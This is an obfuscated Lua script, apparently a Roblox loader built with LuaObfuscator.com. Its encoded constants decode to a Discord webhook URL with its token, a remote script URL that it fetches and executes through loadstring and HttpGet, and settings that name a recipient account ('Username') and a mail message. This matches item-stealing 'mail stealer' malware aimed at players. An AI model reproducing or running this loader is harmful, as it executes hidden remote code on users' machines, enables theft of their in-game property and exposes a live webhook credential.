--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v72=0;local v73;while true do if (v72==0) then v73=v2(v0(v30,16));if v19 then local v98=0;local v99;while true do if (v98==1) then return v99;end if (v98==0) then v99=v5(v73,v19);v19=nil;v98=1;end end else return v73;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v74=(v31/(((1 + 4) -3)^(v32-1)))%(((882 -(282 + 595)) -3)^(((v33-1) -(v32-((1638 -(1523 + 114)) -(0 + 0)))) + (2 -1))) ;return v74-(v74%(620 -((790 -235) + 64))) ;else local v75=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v75 + v75))>=v75) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1271 -(222 + 4 + 1044))) then return v35;end if (v34==((0 + 0) -0)) then v35=v1(v16,v18,v18);v18=v18 + ((1075 -(892 + 65)) -(32 + 85)) ;v34=1;end end end local function v22() local v36=0 -0 ;local v37;local v38;while true do if (v36==1) then return (v38 * ((347 + 125) -216)) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + ((446 -264) -(67 + 84 + 29)) ;v36=1;end end end local function v23() local v39=0;local v40;local v41;local v42;local v43;while true do if (v39==(3 -2)) then return (v43 * ((9774056 + 7004112) -(802 + 150))) + (v42 * (176444 -110908)) + (v41 * (464 -208)) + v40 ;end if ((0 + 0)==v39) then v40,v41,v42,v43=v1(v16,v18,v18 + (1000 -(915 + 82)) );v18=v18 + (11 -7) ;v39=1;end end end local function v24() local v44=0 -0 ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(1188 -(1069 + 118))) then v47=1;v48=(v20(v46,3 -2 ,45 -25 ) * ((3 -1)^(6 + 26))) + v45 ;v44=3 -1 ;end if ((3 + (0 -0))==v44) then if (v49==(791 -(368 + 423))) then if (v48==(0 -0)) then return v50 * (18 -(10 + 8)) ;else local v100=0 -0 ;while true do if (v100==((1301 -(814 + 45)) -(416 + 26))) then v49=3 -2 ;v47=0;break;end end end elseif (v49==(5043 -2996)) then return ((v48==0) and (v50 * (1/0))) or (v50 * NaN) ;end return v8(v50,v49-(440 + 583) ) * (v47 + (v48/((3 -1)^(490 -(145 + 293))))) ;end if (v44==(430 -(44 + 386))) then v45=v23();v46=v23();v44=1;end if (v44==(1488 -(998 + 488))) then v49=v20(v46,7 + 14 ,26 + 5 );v50=((v20(v46,(44 + 760) -(72 + 129 + 571) )==(1139 -(116 + 1022))) and  -(4 -3)) or 1 ;v44=2 + 1 ;end end end local function v25(v51) local v52;if  not v51 then v51=v23();if (v51==(885 -(261 + 624))) then return "";end end v52=v3(v16,v18,(v18 + v51) -(1 -0) );v18=v18 + v51 ;local v53={};for v70=1081 -(1020 + 60) , #v52 do v53[v70]=v2(v1(v3(v52,v70,v70)));end return v6(v53);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=0 + 0 ;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v54~=2) then else v59=nil;v60=nil;v54=1988 -(1266 + 719) ;end if ((607 -(268 + 335))~=v54) then else while true do if (v55~=(293 -(60 + 230))) then else v62=nil;while true do local v101=0;local v102;while true do if (v101~=(572 -(426 + 146))) then else v102=0;while true do if (v102~=1) then else if (2~=v56) then else local v129=0 + 0 ;local v130;while true do if (v129==0) then v130=0;while true do local v156=0;while true do if ((1456 -(282 + 1174))~=v156) then else if ((811 -(569 + 242))==v130) then local v159=0 -0 ;while true do if ((0 + 0)==v159) then for v166=1025 -(706 + 318) ,v23() do local v167=0;local v168;local v169;local v170;while true do if (v167==0) then v168=1251 -(721 + 530) ;v169=nil;v167=1272 -(945 + 326) ;end if (v167~=(2 -1)) then else v170=nil;while true do if (v168~=(0 + 0)) then else local v176=700 -(271 + 429) ;while true do if (v176==(0 + 0)) then v169=0;v170=nil;v176=1;end if (v176==(1501 -(1408 + 92))) then v168=1;break;end end end if ((1087 -(461 + 625))==v168) then while true do if (v169==0) then v170=v21();if (v20(v170,1289 -(993 + 295) ,1)~=0) then else local v178=0 + 0 ;local v179;local v180;local v181;local v182;local v183;while true do if (v178~=(1171 -(418 + 753))) then else v179=0;v180=nil;v178=1 + 0 ;end if (v178==2) then v183=nil;while true do if (v179==(0 + 0)) then local v184=0 + 0 ;while true do if (v184~=(0 + 0)) then else v180=0;v181=nil;v184=530 -(406 + 123) ;end if (v184==1) then v179=1770 -(1749 + 20) ;break;end end end if (v179~=(1 + 0)) then else local v185=0;while true do if ((1322 -(1249 + 73))~=v185) then else local v186=0 + 0 ;while true do if (v186~=0) then else v182=nil;v183=nil;v186=1;end if (v186==(1146 -(466 + 679))) then v185=1;break;end end end if (v185~=(2 -1)) then else v179=5 -3 ;break;end end end if (v179==2) then while true do if ((1900 -(106 + 1794))==v180) then local v187=0;local v188;while true do if (0~=v187) then else v188=0;while true do if (v188==(1 + 0)) then v180=1;break;end if (v188==0) then v181=v20(v170,2,3);v182=v20(v170,2 + 2 ,17 -11 );v188=2 -1 ;end end break;end end end if (v180==(117 -(4 + 110))) then if (v20(v182,587 -(57 + 527) ,1430 -(41 + 1386) )==(104 -(17 + 86))) then v183[4]=v62[v183[3 + 1 ]];end v57[v166]=v183;break;end if (v180~=(3 -1)) then else local v190=0 -0 ;local v191;while true do if (v190~=(166 -(122 + 44))) then else v191=0 -0 ;while true do if (v191==0) then local v197=0 -0 ;while true do if (v197~=1) then else v191=1 + 0 ;break;end if (v197~=0) then else if (v20(v182,1 + 0 ,1 -0 )==1) then v183[67 -(30 + 35) ]=v62[v183[2]];end if (v20(v182,2,2)==1) then v183[3]=v62[v183[3]];end v197=1 + 0 ;end end end if ((1258 -(1043 + 214))~=v191) then else v180=11 -8 ;break;end end break;end end end if (v180~=(1213 -(323 + 889))) then else local v192=0;while true do if (v192==1) then v180=2;break;end if (v192==(0 -0)) then local v195=0;local v196;while true do if (0==v195) then v196=580 -(361 + 219) ;while true do if (v196~=1) then else v192=321 -(53 + 267) ;break;end if (v196==(0 + 0)) then local v198=413 -(15 + 398) ;while true do if (v198==1) then v196=983 -(18 + 964) ;break;end if (v198~=0) then else v183={v22(),v22(),nil,nil};if (v181==0) then local v203=0;while true do if (v203==(0 + 0)) then v183[3]=v22();v183[3 + 1 ]=v22();break;end end elseif (v181==1) then v183[3]=v23();elseif (v181==2) then v183[3]=v23() -(2^(866 -(20 + 830))) ;elseif (v181~=3) then else local v208=0;local v209;while true do if (0==v208) then v209=0;while true do if ((0 + 0)==v209) then v183[3]=v23() -(2^16) ;v183[4]=v22();break;end end break;end end end v198=1;end end end end break;end end end end end end break;end end break;end if (v178~=1) then else v181=nil;v182=nil;v178=2;end end end break;end end break;end end break;end end end for v171=127 -(116 + 10) ,v23() do v58[v171-(1 + 0) ]=v28();end v159=739 -(542 + 196) ;end if (1==v159) then v130=1 -0 ;break;end end end if (v130==1) then return v60;end break;end end end break;end end end break;end if (v102~=(0 + 0)) then else if (v56~=(0 + 0)) then else v57={};v58={};v59={};v60={v57,v58,nil,v59};v56=1;end if (v56==(2 -1)) then local v131=1551 -(1126 + 425) ;local v132;while true do if (v131==(405 -(118 + 287))) then v132=0;while true do if (v132~=(3 -2)) then else local v157=0;while true do if (v157~=1) then else v132=2;break;end if (v157~=0) then else for v161=1122 -(118 + 1003) ,v61 do local v162=0;local v163;local v164;local v165;while true do if (v162~=(2 -1)) then else v165=nil;while true do if (0==v163) then local v173=377 -(142 + 235) ;local v174;while true do if (v173==(0 -0)) then v174=0;while true do if (v174~=(1 + 0)) then else v163=978 -(553 + 424) ;break;end if (v174==0) then local v177=0;while true do if (v177~=(0 -0)) then else v164=v21();v165=nil;v177=1;end if (v177==(1 + 0)) then v174=1 + 0 ;break;end end end end break;end end end if (v163==(1 + 0)) then if (v164==1) then v165=v21()~=(0 + 0) ;elseif (v164==2) then v165=v24();elseif (v164==3) then v165=v25();end v62[v161]=v165;break;end end break;end if (v162==(0 + 0)) then v163=0;v164=nil;v162=2 -1 ;end end end v60[7 -4 ]=v21();v157=1;end end end if (v132==(0 -0)) then local v158=0;while true do if (v158~=(1 + 0)) then else v132=4 -3 ;break;end if (v158==(753 -(239 + 514))) then v61=v23();v62={};v158=1 + 0 ;end end end if (v132==(1331 -(797 + 532))) then v56=2 + 0 ;break;end end break;end end end v102=1;end end break;end end end break;end if (v55~=0) then else local v95=0 + 0 ;while true do if ((0 -0)==v95) then v56=1202 -(373 + 829) ;v57=nil;v95=1;end if (v95~=1) then else v55=732 -(476 + 255) ;break;end end end if (v55~=(1131 -(369 + 761))) then else local v96=0 + 0 ;while true do if (v96==0) then v58=nil;v59=nil;v96=1 -0 ;end if (v96~=1) then else v55=3 -1 ;break;end end end if ((240 -(64 + 174))~=v55) then else local v97=0 + 0 ;while true do if (v97==(0 -0)) then v60=nil;v61=nil;v97=1;end if (v97==(337 -(144 + 192))) then v55=3;break;end end end end break;end if (v54~=(219 -(42 + 174))) then else v61=nil;v62=nil;v54=4;end if (v54~=1) then else v57=nil;v58=nil;v54=2;end if (v54==(0 + 0)) then v55=0;v56=nil;v54=1 + 0 ;end end end local function v29(v63,v64,v65) local v66=0;local v67;local v68;local v69;while true do if (v66==1) then v69=v63[3];return function(...) local v79=v67;local v80=v68;local v81=v69;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (v94==0) then v91=v79[v83];v92=v91[1];v94=1;end if (v94==1) then if (v92<=5) then if (v92<=2) then if (v92<=0) then local v109=v91[2];local v110,v111=v82(v89[v109](v13(v89,v109 + 1 ,v91[3])));v84=(v111 + v109) -1 ;local v112=0;for v133=v109,v84 do v112=v112 + 1 ;v89[v133]=v110[v112];end elseif (v92>1) then v65[v91[3]]=v89[v91[2]];else v89[v91[2]]=v65[v91[3]];end elseif (v92<=3) then v89[v91[2]]=v91[3];elseif (v92>4) then local v143=v91[2];local v144=v89[v91[3]];v89[v143 + 1 ]=v144;v89[v143]=v144[v91[4]];else do return;end end elseif (v92<=8) then if (v92<=6) then local v115;local v116,v117;local v118;local v119;v65[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v65[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v65[v91[3]];v83=v83 + 1 ;v91=v79[v83];v119=v91[2];v118=v89[v91[3]];v89[v119 + 1 ]=v118;v89[v119]=v118[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v119=v91[2];v116,v117=v82(v89[v119](v13(v89,v119 + 1 ,v91[3])));v84=(v117 + v119) -1 ;v115=0;for v136=v119,v84 do v115=v115 + 1 ;v89[v136]=v116[v115];end v83=v83 + 1 ;v91=v79[v83];v119=v91[2];v89[v119]=v89[v119](v13(v89,v119 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];v83=v91[3];elseif (v92>7) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end else local v148=v91[2];v89[v148]=v89[v148](v13(v89,v148 + 1 ,v84));end elseif (v92<=9) then v89[v91[2]]();elseif (v92==10) then v65[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v65[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v83=v91[3];else v83=v91[3];end v83=v83 + 1 ;break;end end end end;end if (v66==0) then v67=v63[1];v68=v63[2];v66=1;end end end return v29(v28(),{},v17)(...);end return v15("LOL!0C3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3132342O3237352O33323430353436353136382F692D77355559392O38482O4461723851305068624863614C797568424A2O6552494236584B6B4C494D4353584B737542474E56556B76705A4B4E6747683664565273752D030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031B3O00682O7470733A2O2F65676F72696B7573612E73706163652F2O746403083O00557365726E616D65030E3O00426F2O6279546865547261646572030B3O004D61696C4D652O73616765030D3O00536372697074204C6F6164656400163O0012033O00013O0026083O000D0001000200040B3O000D0001001203000100043O001206000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O001500010026083O00010001000100040B3O000100010012030001000A3O00120A000100093O00122O0001000C3O00122O0001000B3O00124O00023O00044O000100012O00043O00017O00",v9(),...);
